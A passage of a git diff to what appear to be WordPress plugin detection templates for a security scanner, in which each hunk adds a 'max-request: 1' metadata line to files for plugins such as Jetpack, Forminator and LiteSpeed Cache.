https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..b9de0ee313 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..8033aacbc6 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: + max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bbc305b8de..3da2ea50e1 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ 